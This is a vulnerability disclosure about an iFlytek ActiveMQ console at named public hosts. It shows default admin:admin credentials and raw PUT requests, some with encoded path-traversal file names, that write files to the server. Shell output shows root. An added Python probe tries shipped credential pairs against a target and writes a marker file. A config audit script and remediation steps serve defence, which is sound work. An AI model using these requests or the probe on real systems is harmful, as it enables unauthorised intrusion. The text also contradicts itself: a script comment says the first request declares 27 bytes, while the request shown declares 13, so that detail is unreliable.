iFlytek (科大讯飞) ActiveMQ admin console weak password leads to command execution

Brief description:

iFlytek (科大讯飞) ActiveMQ admin console weak password leads to command execution
http://zone.wooyun.org/content/26827

Detailed description:

#1 Vulnerable sites: the ActiveMQ web console (port 8161) is exposed to the internet

http://117.121.50.210:8161/admin/

http://ai.iflytek.com:8161/admin/

#2 Weak password

The management console still accepts the credentials that ship with ActiveMQ, admin:admin.

#3 Owning system

Visiting http://117.121.50.210 redirects to www.xfyun.cn.

#4 ActiveMQ ships a fileserver webapp with RESTful file access: with the console credentials, PUT writes an arbitrary file under /fileserver/ (GET reads it back, DELETE removes it).

For the exploitation details, see: http://zone.wooyun.org/content/26827

Proof of concept:

Code block (the raw request is piped into nc; Content-Length must equal the body length, here 13 bytes for "this is shell", otherwise the server keeps waiting for the missing bytes)
<code>nc 117.121.50.210 8161
PUT /fileserver/shell.txt HTTP/1.0
Content-Length: 13
Host: 117.121.50.210:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

this is shell</code>

[Screenshot: xf.png]

Code block
<code>PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 117.121.50.210:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

123123123123123123123123123</code>

Resulting path: /fileserver/3.jsp

Code block
<code>PUT /fileserver/a../%08/...%08/.%08/%08admin/3.jsp HTTP/1.0
Content-Length: 27
Host: 117.121.50.210:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

123123123123123123123123123</code>

Resulting path: /fileserver/a../../admin/3.jsp

# A file written under /fileserver/ is not executed there, so getting a shell needs another method, or CVE-2016-3088 (fileserver PUT followed by MOVE with a Destination header pointing into the admin webapp; fixed in ActiveMQ 5.14.0).

Code block
<code>$ pwd
/usr/local/activemq/activemq/webapps/fileserver/
$ whoami
root
$ hostname
bj-web</code>
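The following script is an added example and is not part of the WooYun report or of ActiveMQ itself. It rebuilds the raw requests above with a Content-Length derived from the body, and runs a non-destructive write probe against /fileserver/ (PUT a text marker, read it back, DELETE it). Assumed, and to be verified against your ActiveMQ version: the fileserver RestFilter answers a successful PUT with 204 No Content and implements DELETE; the host, port and marker file name are placeholders. The admin/admin and user/user accounts are the ones stock ActiveMQ 5.x writes into conf/jetty-realm.properties.

```python
# Added example, not from the report: raw request builder plus a safe /fileserver/ write probe.
import base64
import http.client
from typing import Dict, Optional

# Both accounts ship in conf/jetty-realm.properties of a stock ActiveMQ 5.x install.
DEFAULT_CREDS = [("admin", "admin"), ("user", "user")]


def basic_auth_header(user: str, password: str) -> str:
    """HTTP Basic credentials; admin:admin yields the YWRtaW46YWRtaW4= token seen in the report."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode("ascii")
    return f"Basic {token}"


def build_raw_request(method: str, path: str, host: str, port: int, body: bytes,
                      user: str, password: str,
                      extra_headers: Optional[Dict[str, str]] = None) -> bytes:
    """Raw HTTP/1.0 request of the shape piped into nc in the report.

    Content-Length comes from the body itself: the report's first request declares 27
    bytes for the 13-byte body "this is shell", which leaves the server waiting for data.
    """
    headers = {
        "Content-Length": str(len(body)),
        "Host": f"{host}:{port}",
        "Connection": "Close",
        "Authorization": basic_auth_header(user, password),
    }
    headers.update(extra_headers or {})  # e.g. a Destination header for a MOVE request
    head = f"{method} {path} HTTP/1.0\r\n"
    head += "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return head.encode("ascii") + b"\r\n" + body


def parse_status_line(response: bytes) -> int:
    """Status code of a raw response, e.g. b'HTTP/1.1 204 No Content\\r\\n...' -> 204."""
    first = response.split(b"\r\n", 1)[0].decode("latin-1")
    parts = first.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError(f"not an HTTP status line: {first!r}")
    return int(parts[1])


def classify_put(status: int) -> str:
    """What the status of PUT /fileserver/<name> says about the target (assumed mapping)."""
    if status in (200, 201, 204):
        return "writable"        # file stored; 204 is what RestFilter is assumed to send
    if status == 401:
        return "auth-rejected"   # console present, these credentials not accepted
    if status == 403:
        return "forbidden"
    if status == 404:
        return "no-fileserver"   # context not deployed (removed from defaults in 5.14.0)
    if status == 405:
        return "put-disabled"
    return f"unexpected-{status}"


def check_fileserver(host: str, port: int = 8161, user: str = "admin",
                     password: str = "admin",
                     marker: str = "_fileserver_probe_delete_me.txt") -> str:
    """PUT a harmless marker, confirm it is served back, then DELETE it.

    "writable" means whoever holds these credentials can drop files, which is the
    precondition for the JSP write-up shown in the report.
    """
    conn = http.client.HTTPConnection(host, port, timeout=10)
    hdrs = {"Authorization": basic_auth_header(user, password)}
    body = b"fileserver write probe - safe to delete\n"
    path = f"/fileserver/{marker}"
    try:
        conn.request("PUT", path, body=body, headers=hdrs)
        resp = conn.getresponse()
        resp.read()
        verdict = classify_put(resp.status)
        if verdict == "writable":
            conn.request("GET", path, headers=hdrs)
            resp = conn.getresponse()
            if not (resp.status == 200 and resp.read() == body):
                verdict = "writable-but-unreadable"  # stored, but not served back to us
            conn.request("DELETE", path, headers=hdrs)  # clean up our own marker
            conn.getresponse().read()
        return verdict
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # placeholder target
    for u, p in DEFAULT_CREDS:
        print(u, check_fileserver(target, user=u, password=p))
```

Run it only against hosts you are authorised to test; the marker is plain text and is deleted again, but the PUT itself is still a write to the target.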

Remediation:

# Do not expose the web console (port 8161) to the internet: bind it to 127.0.0.1 in conf/jetty.xml or firewall the port.
# Replace the shipped admin:admin and user:user credentials in conf/jetty-realm.properties.
# Remove the fileserver webapp context from conf/jetty.xml, or upgrade to ActiveMQ 5.14.0 or later, where it is no longer enabled by default.
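The following audit script is an added example and is not part of the report or of the ActiveMQ project. It parses the two configuration files behind this finding, conf/jetty-realm.properties (console accounts, Jetty "name: password, role" syntax) and conf/jetty.xml (console bind address and the fileserver context), and flags the shipped defaults. The sample file contents are constructed to mirror a stock 5.x install; the 12-character minimum for passwords and the bean property names checked are assumptions to adjust to your version.

```python
# Added example, not from the report: flag the ActiveMQ config defaults this finding relies on.
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Accounts stock ActiveMQ 5.x writes into conf/jetty-realm.properties.
SHIPPED_DEFAULTS = {"admin": "admin", "user": "user"}
MIN_PASSWORD_LEN = 12  # assumed policy threshold
# Jetty prefixes for passwords stored obfuscated or hashed rather than in clear text.
NON_PLAINTEXT_PREFIXES = ("OBF:", "MD5:", "CRYPT:")

# Constructed sample, modelled on the file as shipped.
SAMPLE_REALM = """\
# Defines users that can access the web (console, demo, etc.)
# username: password [,rolename ...]
admin: admin, admin
user: user, user
"""

# Constructed sample with the two beans the audit looks at.
SAMPLE_JETTY_XML = """\
<beans xmlns="http://www.springframework.org/schema/beans">
  <bean class="org.eclipse.jetty.webapp.WebAppContext">
    <property name="contextPath" value="/fileserver"/>
    <property name="resourceBase" value="${activemq.home}/webapps/fileserver"/>
  </bean>
  <bean id="jettyPort" class="org.apache.activemq.web.WebConsolePort" init-method="start">
    <property name="host" value="0.0.0.0"/>
    <property name="port" value="8161"/>
  </bean>
</beans>
"""


def parse_jetty_realm(text: str) -> Dict[str, Tuple[str, List[str]]]:
    """Parse 'username: password, role1, role2' lines into {name: (password, roles)}."""
    users: Dict[str, Tuple[str, List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, rest = line.partition(":")
        if not sep:
            continue
        fields = [f.strip() for f in rest.split(",")]
        users[name.strip()] = (fields[0], [r for r in fields[1:] if r])
    return users


def audit_realm(text: str) -> List[str]:
    """Report accounts still on the shipped default, or with a weak clear-text password."""
    findings = []
    for name, (password, roles) in parse_jetty_realm(text).items():
        if password.startswith(NON_PLAINTEXT_PREFIXES):
            continue  # cannot judge strength of an obfuscated/hashed value here
        if SHIPPED_DEFAULTS.get(name) == password:
            findings.append(f"{name}: shipped default password still set, roles {roles}")
        elif password == name or len(password) < MIN_PASSWORD_LEN:
            findings.append(f"{name}: weak password, roles {roles}")
    return findings


def _local(tag: str) -> str:
    """Strip the Spring beans namespace so elements can be matched by local name."""
    return tag.rsplit("}", 1)[-1]


def audit_jetty_xml(text: str) -> List[str]:
    """Flag a console bound to all interfaces and a deployed /fileserver context."""
    findings = []
    for bean in ET.fromstring(text).iter():
        if _local(bean.tag) != "bean":
            continue
        props = {p.get("name"): p.get("value") for p in bean if _local(p.tag) == "property"}
        if props.get("host") == "0.0.0.0":
            ident = bean.get("id") or bean.get("class")
            findings.append(f"{ident}: listens on 0.0.0.0 port {props.get('port', '?')}; "
                            "bind to 127.0.0.1 or firewall the port")
        if props.get("contextPath") == "/fileserver":
            findings.append("fileserver webapp deployed: arbitrary file write for anyone "
                            "with console credentials; remove this bean or upgrade to 5.14.0+")
    return findings


def audit(realm_text: str = SAMPLE_REALM, jetty_xml: str = SAMPLE_JETTY_XML) -> List[str]:
    return audit_realm(realm_text) + audit_jetty_xml(jetty_xml)


if __name__ == "__main__":
    for finding in audit():
        print("-", finding)
```

Point `audit()` at the real files under the broker's conf/ directory; an empty result means the three remediation items above are in place as far as these two files show.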